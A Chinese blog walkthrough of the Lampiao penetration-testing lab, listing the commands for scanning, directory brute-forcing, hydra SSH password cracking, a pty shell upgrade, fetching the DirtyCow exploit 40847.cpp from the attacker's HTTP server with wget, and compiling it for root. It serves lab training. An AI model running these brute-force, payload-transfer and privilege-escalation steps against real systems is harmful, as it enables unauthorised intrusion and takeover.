首页 > 其他分享 >Lampiao靶场-dirtycow漏洞利用

Lampiao靶场-dirtycow漏洞利用

时间:2023-04-11 18:13:19浏览次数:53  
标签:http Lampiao 142.133 192.168 靶机 40847 靶场 dirtycow

Lampiao靶场-dirtycow漏洞利用

目录

只是简单记录一下所用工具

靶机信息:

靶机:192.168.142.132

攻击机:192.168.142.133

一、主机发现

nmap -sP 192.168.142.0/24

需要自己判断一下,哪台是靶机。

二、端口扫描

nmap -A -p- 192.168.142.132

进行端口扫描,获取端口信息,发现有22、80、1898端口开放

三、目录遍历

目录遍历可以使用dirb或者dirsearch工具

dirb http://192.168.142.133:1898

python3 dirsearch.py -u http://192.168.142.133:1898

个人感觉dirsearch比较速度更快

四、拿到webshell

这里就不写了,网上太多了。

五、实现交互式shell

python -c "import pty;pty.spawn('/bin/bash')"

其他方式参考大佬的文章,发现好东西就分享,我就不复制粘贴了。

https://saucer-man.com/information_security/233.html

六、暴力破解

因为有22端口,存在爆破的可能性,先收集一下网站信息做一个字典

cewl http://192.168.142.133:1898 -w lampiao.txt

用hydra进行ssh的暴力破解

hydra -l tiago -P lampiao.txt 192.168.142.133 ssh

补充:

-l后面加用户名,拿到交互式shell后可以查询一下/etc/passwd文件,自然可以拿到用户名。前期是拿不到其他用户名的,发现22端口开放也只能爆破root。

如果直接爆破root成功,恭喜你游戏结束。

七、把dirtycow脚本传到靶机

1、用python开启http服务

在攻击机上用python开启一个端口为3333的http服务

python -m http.server 3333

靶机用wget下载dirtycow脚本,当然有一些细节,需要自己去思考。

wget http://192.168.142.133:3333/40847.cpp

2、ssh服务传输文件

参考资料:

https://zhuanlan.zhihu.com/p/507876254

攻击机上运行:

rsync 40847.cpp [email protected]:/home/tiago

或者

靶机上运行:

rsync [email protected]:/root/桌面/40847.cpp .(.是代表当前路径)

八、编译运行dirtycow脚本

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil

  1. -Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
  2. -pedantic 允许发出ANSI/ISO C标准所列出的所有警告
  3. -O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
  4. -std=c++11就是用按C++2011标准来编译的
  5. -pthread 在Linux中要用到多线程时,需要链接pthread库
  6. -o dcow gcc生成的目标文件,名字为dcow

参考资料:

https://blog.csdn.net/weixin_43715506/article/details/113410027

https://blog.csdn.net/qq_42967398/article/details/102536576

标签:http,Lampiao,142.133,192.168,靶机,40847,靶场,dirtycow
From: https://www.cnblogs.com/candada/p/17307154.html

相关文章

  • 渗透测试靶场及安装
    1.简介什么是渗透测试靶场渗透测试靶场是一个模拟真实网络环境的平台,用于进行安全渗透测试和漏洞攻击的训练。它通常包括多个虚拟机或容器,模拟不同的操作系统、应用程序和网络环境,以便测试人员可以在安全的环境中进行各种攻击和测试。渗透测试靶场可以帮助测试人员提高技能和......
  • pikachu靶场任意文件下载漏洞
    任意文件下载漏洞位置点击链接可以直接下载文件右键选择复制链接使用相对路径进行访问,可以下载任意文件../表示的就是一层目录但是也可以读取一些类型的文件内容如果关闭post提交则会继续下载文件......
  • 基于墨者靶场报错盲注分析SQL注入之报错盲注
    报错注入是利用了数据库的某些机制,人为的制造错误条件,是的查询结果能够出现在错误信息中。有xpath语法错误xpath语法错误利用xpath语法错误进行报错注入时利用了extractvlue与updatexml两个函数。使用条件:nysql版本大于5.1.5extractvalue函数原型:extractvalue(xml_document,Xpath......
  • narak靶场ssh连接出现问题报错
    做narak靶场的时候遇到下面问题:WARNING:REMOTEHOSTIDENTIFICATIONHASCHANGED!ssh连接报错,解决办法:原因:可能是因为上一层连接是没连接上,就把kali关闭了,然后靶机出现了一个know_hosts.old文件,如果要再次连接,需要删除这文件参考文章:https://blog.csdn.net/qq_41884002/article/d......
  • docker搭建dvwa靶场
    查看有哪些DVWA镜像dockersearchdvwa这里选择拉取第一个镜像dockerpullcitizenstig/dvwa访问https://hub.docker.com/搜索镜像名称点击搜索结果,查看信息查看启动方式在kali中输入以下命令dockerrun-d-p80:80citizenstig/dvwa补充:-p80:......
  • CISP-PTE靶场通关思路分享-文件包含篇(十分友好,无比详细)
    PTE靶场包含5道Web题之文件包含靶场,此靶场为模拟靶场文件包含从首页中我们知道了需要读取根目录下的key.php文件,尝试获取WebShell   不获取Shell,直接读取key.php文件内容:使用伪协议php://filter可以达到的目的;使用data伪协议使用伪协议data://可以达到注入木......
  • vulnstack1 靶场做题笔记
    一、环境部署1.1靶场下载下载靶场(win7+win2003+win2008),下载攻击机kalilinux下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/靶机通用密码:hongrisec@2019(密码策略原因登录后都会进行修改),这里我改成[email protected]网卡配置环境分析:winserver2008图......
  • CISP-PTE靶场通关思路分享-SQL注入篇
    pte靶场中包含5道web题SQL注入首先打开本地搭建的网址,发现我们需要利用SQL注入对/tmp/360/key文件进行读取,读取该文件需要使用load_file()函数,该函数是MySQL中常见内置函数。   进入答题后,发现由当前执行的SQL语句,按照当前执行的SQL语句对SQL语法进行闭合 1http:/......
  • 渗透测试靶场
    sqli-labssqli-labs包含了大多数的sql注入类型,以一种闯关模式,对于sql注入进行漏洞利用下载地址:https://github.com/Audi-1/sqli-labsxsschallengesxsschallenges是一个专对于XSS漏洞练习的在线靶场,包含了各种绕过,各种姿势的XSS利用下载地址:http://xss-quiz.int21h.jp/xss-l......
  • vulnhub靶场之WIRELESS: 1
    准备:攻击机:虚拟机kali、本机win10。靶机:Wireless:1,下载地址:https://download.vulnhub.com/wireless/Mystiko-Wireless.rar,下载后直接vm打开即可。知识点:lxd提权、密码......